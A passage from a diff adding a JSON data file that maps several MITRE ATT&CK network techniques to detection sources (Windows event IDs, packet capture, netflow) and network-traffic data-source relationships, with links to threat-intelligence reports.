This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + null + ] + }, + { + "technique_id": "T1001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "FW Logs" + ], + [ + "Network protocol analysis" + ], + [ + "Packet capture" + ], + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "FW Logs" + ], + [ + "Network protocol analysis" + ], + [ + "Packet capture" + ], + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf", + "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf", + null + ] + }, + { + "technique_id": "T1172", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "SSL/TLS inspection" + ], + [ + "Packet capture" + ], + [ + "SSL/TLS inspection" + ], + [ + "Packet capture" + ] + ], + "external_reference": [ + "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016" + ] + }, + { + "technique_id": "T1026", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Malware reverse engineering" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Malware reverse engineering" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + 
"external_reference": [ + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", NaN + ] + }, + { + "technique_id": "T1188", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "Network protocol analysis" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Network protocol analysis" + ], + [ + "Netflow/Enclave netflow" + ] + ], + "external_reference": [ + "https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html", + "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016" + ] + }, + { + "technique_id": "T1079", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Malware reverse engineering" + ], + [ + "Packet capture" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Malware reverse engineering" + ], + [ + "Packet capture" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1104", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "5156", + "Windows Firewall" + ], + [ + "Network device logs" + ], + [ + "Network protocol analysis" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Network device logs" + ], + [ + "Network protocol analysis" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + } + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", + null + ] + }, + { + "technique_id": "T1032", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Malware reverse engineering" + ], + [ + "SSL/TLS inspection" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Malware reverse engineering" + ], + [ + "SSL/TLS inspection" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ] + ], + "external_reference": [ 